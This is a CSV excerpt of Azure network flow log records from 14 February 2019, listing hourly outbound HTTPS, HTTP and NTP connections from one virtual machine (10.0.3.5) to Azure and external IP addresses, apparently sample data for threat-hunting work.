+589,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:01:16.000,2019-02-14 04:59:23.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,26.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,26.0
+593,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:08:46.000,2019-02-14 04:51:37.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+594,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:08:46.000,2019-02-14 04:51:37.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+585,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:09:10.000,2019-02-14 04:22:16.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.187.212', '13.86.124.191', '13.67.143.117']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,13.86.124.191,4.0
+586,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:09:10.000,2019-02-14 04:22:16.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.187.212', '13.86.124.191', '13.67.143.117']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,4.0
+584,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:09:10.000,2019-02-14 04:22:16.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.89.187.212', '13.86.124.191', '13.67.143.117']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,centralus,eastus,13.89.187.212,4.0
+605,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:12:46.000,2019-02-14 04:41:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '20.41.41.23', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+606,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:12:46.000,2019-02-14 04:41:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '20.41.41.23', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,20.41.41.23,9.0
+607,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:12:46.000,2019-02-14 04:41:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '20.41.41.23', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+596,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:13:00.000,2019-02-14 04:20:56.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.168.138.145', '52.179.17.38']",,,U,ntp,123.0,O,2.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,2.0
+597,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:13:00.000,2019-02-14 04:20:56.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.168.138.145', '52.179.17.38']",,,U,ntp,123.0,O,2.0,0.0,0.0,0.0,eastus,eastus,52.179.17.38,2.0
+600,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:21:03.000,2019-02-14 04:22:58.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.142', '172.217.15.110']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,157.55.134.142,2.0
+601,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:21:03.000,2019-02-14 04:22:58.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.142', '172.217.15.110']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.15.110,2.0
+604,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:02.000,2019-02-14 04:23:34.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['168.62.32.212', '20.38.98.100', '52.239.152.10']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.239.152.10,4.0
+602,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:02.000,2019-02-14 04:23:34.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['168.62.32.212', '20.38.98.100', '52.239.152.10']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,168.62.32.212,4.0
+603,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:02.000,2019-02-14 04:23:34.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['168.62.32.212', '20.38.98.100', '52.239.152.10']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,4.0
+595,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:14.000,2019-02-14 04:26:01.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,2.0
+592,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:22:16.000,2019-02-14 04:26:02.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.240', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,13.107.4.50,2.0
+591,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:22:16.000,2019-02-14 04:26:02.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.240', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.240,2.0
+599,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:25:58.000,2019-02-14 04:56:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+598,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:25:58.000,2019-02-14 04:56:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,13.74.179.117,2.0
+588,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:25:59.000,2019-02-14 04:31:26.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.252.190', '40.91.75.5']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus2,eastus,40.91.75.5,2.0
+587,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:25:59.000,2019-02-14 04:31:26.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.252.190', '40.91.75.5']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus2,eastus,65.55.252.190,2.0
+609,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:00:05.000,2019-02-14 05:57:29.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,22.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,22.0
+610,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:00:05.000,2019-02-14 05:57:29.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,22.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,22.0
+613,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:11:21.000,2019-02-14 05:26:21.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+611,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:11:34.000,2019-02-14 05:51:37.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+612,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:11:34.000,2019-02-14 05:51:37.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+608,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:21:57.000,2019-02-14 05:21:57.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+615,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:41:22.000,2019-02-14 05:56:22.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,3.0
+614,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:41:22.000,2019-02-14 05:56:22.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+582,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:01:34.000,2019-02-14 06:51:34.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+581,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:01:34.000,2019-02-14 06:51:34.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+580,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:02:04.000,2019-02-14 06:58:50.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+579,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:02:04.000,2019-02-14 06:58:50.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+583,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.943,2019-02-14 06:11:22.000,2019-02-14 06:56:22.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+578,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:21:57.000,2019-02-14 06:21:57.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+571,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:00:32.000,2019-02-14 07:59:04.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+572,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:00:32.000,2019-02-14 07:59:04.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+575,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:02:01.000,2019-02-14 07:02:01.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+576,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:11:23.000,2019-02-14 07:11:23.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+573,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:21:37.000,2019-02-14 07:51:54.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+574,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:21:37.000,2019-02-14 07:51:54.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+570,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:21:58.000,2019-02-14 07:21:58.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+577,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:26:23.000,2019-02-14 07:56:23.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+555,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:03:44.000,2019-02-14 08:56:44.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+554,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:03:44.000,2019-02-14 08:56:44.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+561,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:11:24.000,2019-02-14 08:56:24.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+558,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:20:01.000,2019-02-14 08:20:01.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+556,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:21:37.000,2019-02-14 08:51:55.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+557,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:21:37.000,2019-02-14 08:51:55.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+553,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:21:58.000,2019-02-14 08:21:58.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+559,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:28:58.000,2019-02-14 08:28:58.000,2019-02-14 09:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+560,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:32:46.000,2019-02-14 08:32:46.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+564,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:01:56.000,2019-02-14 09:57:16.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,19.0
+563,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:01:56.000,2019-02-14 09:57:16.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,19.0
+566,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:11:24.000,2019-02-14 09:11:24.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+565,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:21:34.000,2019-02-14 09:51:37.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.65.107.32'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,2.0
+569,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:21:55.000,2019-02-14 09:56:25.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+568,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:21:55.000,2019-02-14 09:56:25.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+567,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:21:55.000,2019-02-14 09:56:25.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+562,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:21:58.000,2019-02-14 09:21:58.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+545,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:02:33.000,2019-02-14 10:57:04.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+546,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:02:33.000,2019-02-14 10:57:04.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+552,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:06:55.000,2019-02-14 10:56:26.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+551,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:06:55.000,2019-02-14 10:56:26.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+550,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:11:34.000,2019-02-14 10:51:37.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+549,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:11:34.000,2019-02-14 10:51:37.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+544,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:21:58.000,2019-02-14 10:21:58.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+547,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:49:04.000,2019-02-14 10:49:14.000,2019-02-14 11:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.4.187.27', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,23.4.187.27,3.0
+548,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:49:04.000,2019-02-14 10:49:14.000,2019-02-14 11:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.4.187.27', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,72.21.81.240,3.0
+537,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:00:05.000,2019-02-14 11:55:15.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+536,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:00:05.000,2019-02-14 11:55:15.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+538,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:01:34.000,2019-02-14 11:51:55.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+539,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:01:34.000,2019-02-14 11:51:55.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+541,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:05:02.000,2019-02-14 11:56:27.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+542,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:05:02.000,2019-02-14 11:56:27.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
